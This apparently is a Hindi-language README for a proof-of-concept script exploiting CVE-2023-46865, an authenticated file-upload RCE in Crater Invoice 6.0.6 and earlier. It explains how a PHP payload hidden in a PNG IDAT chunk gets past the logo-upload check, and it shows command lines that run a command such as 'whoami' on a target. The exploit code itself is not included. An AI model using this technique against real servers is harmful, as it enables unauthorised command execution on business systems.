
Crater <=6.0.6, CVE-2023-46865 पोस्ट-प्रमाणीकरण RCE (सुपरएडमिन)
Crater <=6.0.6, CVE-2023-46865 प्रमाणीकरण के बाद RCE (सुपरएडमिन)
Crater Invoice, उचित इनपुट सत्यापन के अभाव के कारण खतरनाक प्रकार के साथ अप्रतिबंधित फ़ाइल अपलोड के लिए संवेदनशील है। Base64Mime जाँच वर्ग को IDAT इमेज चंक में एक वैध PHP पेलोड एम्बेड करके बायपास किया जा सकता है। सुपरएडमिन विशेषाधिकारों वाला उपयोगकर्ता /api/v1/company/upload-logo पर कंपनी लोगो के माध्यम से तैयार पेलोड अपलोड करने में सक्षम है।
$~ usage: python3 crater-rce.py --target TARGET --email EMAIL --password PASSWORD [--cmd CMD]
$~ python3 crater-rce.py --target http://192.168.1.1 --email [email protected] --password test1234 --cmd 'whoami'
$~ python3 crater-rce.py -h
usage: crater-rce.py [-h] --target TARGET --email EMAIL --password PASSWORD [--cmd CMD]
Crater Invoice RCE - CVE-2023-46865
options:
-h, --help show this help message and exit
--target TARGET Target URL
--email EMAIL Email
--password PASSWORD Password
--cmd CMD Command to execute
- Crater 6.0.6
- Kali 6.1.0
faisalfs10x - पूर्व-अवधारणा (proof of concept) विकसित करने में मदद करने के लिए।
यह स्क्रिप्ट केवल सुरक्षा विश्लेषण और शोध के लिए है, इसलिए यदि इसका उपयोग अवैध गतिविधियों के लिए किया जाता है तो मैं उत्तरदायी नहीं रहूँगा।